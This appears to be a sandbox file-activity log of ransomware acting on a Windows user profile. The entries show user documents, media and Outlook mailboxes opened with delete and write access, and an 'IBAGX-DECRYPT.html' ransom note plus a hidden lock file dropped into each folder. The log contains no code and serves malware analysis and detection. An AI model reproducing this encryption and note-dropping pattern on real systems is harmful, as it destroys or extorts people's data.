Create C:\Users\EEBsYm5\Desktop\ad_Tuc8.pps desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\ex0MfWSTF6uCN0DP.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\eXNP4DhaJoANqCq.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\g7mt5-SI_hHnzE.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\JMyoxX2 3X d6jTWhO.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\1PqlR.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\200Iz-C-f0nKIP ff.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\74-V-SbJd.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\G_oqdbQ64.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\0IHc8uAhJnb-Q.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\9j oiWdFEKpFCdim_0.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\A9egdeW4P.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\RLjqHSrzY.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\U0ht6rC7mN9egdk.gif desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\ZlXEoiVfGfnX.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\P67Lb\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\P67Lb\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\P67Lb\-a9c.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\zAvVCDMGKYcJB8.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\ZMVPUoR4Ey_\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\ZMVPUoR4Ey_\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\ZMVPUoR4Ey_\ezswwH.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\ZMVPUoR4Ey_\kZHZh4.ppt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\ZMVPUoR4Ey_\PCQ1 cz9T-LwwY8.flv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\NiFznrza-cuYhF3XD.odt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\PLO41w6ANW9pL7.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\rB5hKaXeP5JR.flv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\s0Wrd7q9CMtp_fsJOz6b.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\YmArDfnGLJU.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\YwiFBFx2VZDk0I.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\zn0R8uiu0U0YNg5hW cJ.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\-AklCqe39X1_.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\-Iwok.ppt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\-_udZ9H-md026R1 Y.ppt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\01hJy.odp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\2aJ44J.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\3bj9uZ.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\4N 7U.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\4teabLPmh.doc desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\78MMU46.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\8b k1TNzn-EWnDs.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\aqN UKHSTcas3Lof.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\BUbmaM2Cs.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\BWa71g9bKR14.ots desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\CptF0CQptW.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\DR-dN95_OGPo50XZ.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\Ec5m5yEnbdvw0N.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\fdQCv4xTextmBuV75 T.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\fh kVD.ots desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\FNbhvj.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\g7gsGDs6Z5SOfWF.doc desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\GS5zGTs.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\gzpDmePLWUQ-3aL2.ods desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\IABwhWssazxs.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\IfG35dKsGuJWChXuwlaP.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\ItN 9hMlFUbe.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\iXfxaz7.ppt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\Jb-3SP4fL9j3NKyqknte.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\JjOcfuG.doc desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\JwzV5eRX71p7.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\K smlrz.ppt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\Ln4 11aV.odt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\lND3S0zYE.odp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\lSnud6IXFLA_JmAsw3.ots desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\l_ 5qSZy_LxOOMHdkksx.ods desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\m6x7dtSmh7Qv0q5OP7.odt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\MfEGZi5wBZ.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\My Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\My Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\My Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\My Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\My Shapes\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\My Shapes\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\My Shapes\_private\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\My Shapes\_private\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\My Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\My Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\OTggDUZVML.ots desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\Outlook Files\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\Outlook Files\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Documents\Outlook Files\feasf@efw.com.pst desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\Outlook Files\Outlook Data File - mail.pst desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\pjtdG1IhTs0F_.ods desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\PtWDDKT48ZZRUp0.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\Pw4959I.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\R Al.csv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\RcPvvQ.rtf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\S3c10E.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\Sal-.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\sFJh12vz2.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\tI5FlZ6hziikPfsg5.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\TLmNEpd.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\uCwmeKTSRVgfGO6IafsY.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\v1ScY3iP2CWDG2MFD.ods desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\vDMgfqDMCjBF0dZrH.doc desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\VPanbWR3r.rtf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\W7N38.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\WrUqIkCs3GuozHaQ.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\Ylbgmh.rtf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Documents\Zx8WCNwNF.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Downloads\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Downloads\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Favorites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Favorites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Links\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Links\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Links\Suggested Sites.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Links\Web Slice Gallery.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\IE Add-on site.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\IE site on Microsoft.com.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\Microsoft At Home.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\Microsoft At Work.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Microsoft Websites\Microsoft Store.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\MSN Websites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
